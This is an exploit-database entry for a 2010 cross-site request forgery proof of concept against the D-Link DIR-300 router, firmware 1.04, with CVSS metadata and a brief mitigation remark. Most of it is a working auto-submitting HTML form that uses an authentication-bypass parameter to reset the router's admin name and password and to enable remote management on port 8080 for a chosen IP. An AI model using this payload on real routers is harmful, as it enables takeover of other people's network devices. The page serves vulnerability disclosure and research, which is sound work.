D-Link DIR-300 CSRF Vuln. (Change Admin Account Settings) PoC Exploit

vendor:

DIR-300

by:

outlaw.dll

6,8

CVSS

MEDIUM

Cross-Site Request Forgery (CSRF)

352

CWE

Product Name: DIR-300

Affected Version From: 1.04

Affected Version To: 1.04

Patch Exists: NO

Related CWE: N/A

CPE: h:d-link:dir-300

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows, Linux, Mac

2010

D-Link DIR-300 CSRF Vuln. (Change Admin Account Settings) PoC Exploit

This PoC exploit enables remote management for a specific IP address on the D-Link DIR-300 router with firmware version 1.04. No need for an administrator to be logged in. The exploit is tested on Windows 7 Ultimate with Google Chrome, but will work on any other OS.

Mitigation:

Implementing CSRF protection mechanisms, such as anti-CSRF tokens, can help mitigate the risk of CSRF attacks.

Source

Exploit-DB raw data:

<!--

[+] Title: D-Link DIR-300 CSRF Vuln. (Change Admin Account Settings) PoC Exploit
[+] Description: Enable Remote Menagement for specific IP
[+] Firmware Version: 1.04
[+] Note: No need administrator to be logged (:
[+] Author: outlaw.dll
[+] Date: 17.12.2010
[+] Tested on: Windows 7 Ultimate (Google Chrome) but will work in any other OS

This firmware version is full of CSRF and other type of vulnerabilities.
W_o.O_W

-->
<form name="exploit" action="http://server/tools_admin.php?NO_NEED_AUTH=1&AUTH_GROUP=0" method="post">
        <input type="hidden" name="ACTION_POST" value="1" />
        <input type="hidden" name="admin_name" value="outlaw.dll" />
        <input type="hidden" name="admin_password1" value="1337" />
        <input type="hidden" name="admin_password2" value="1337" />
        <input type="hidden" name="rt_enable_h" value="1" />
        <input type="hidden" name="rt_port" value="8080" />
        <input type="hidden" name="rt_ipaddr" value="192.168.0.1337" />
</form>
<script>document.exploit.submit();</script>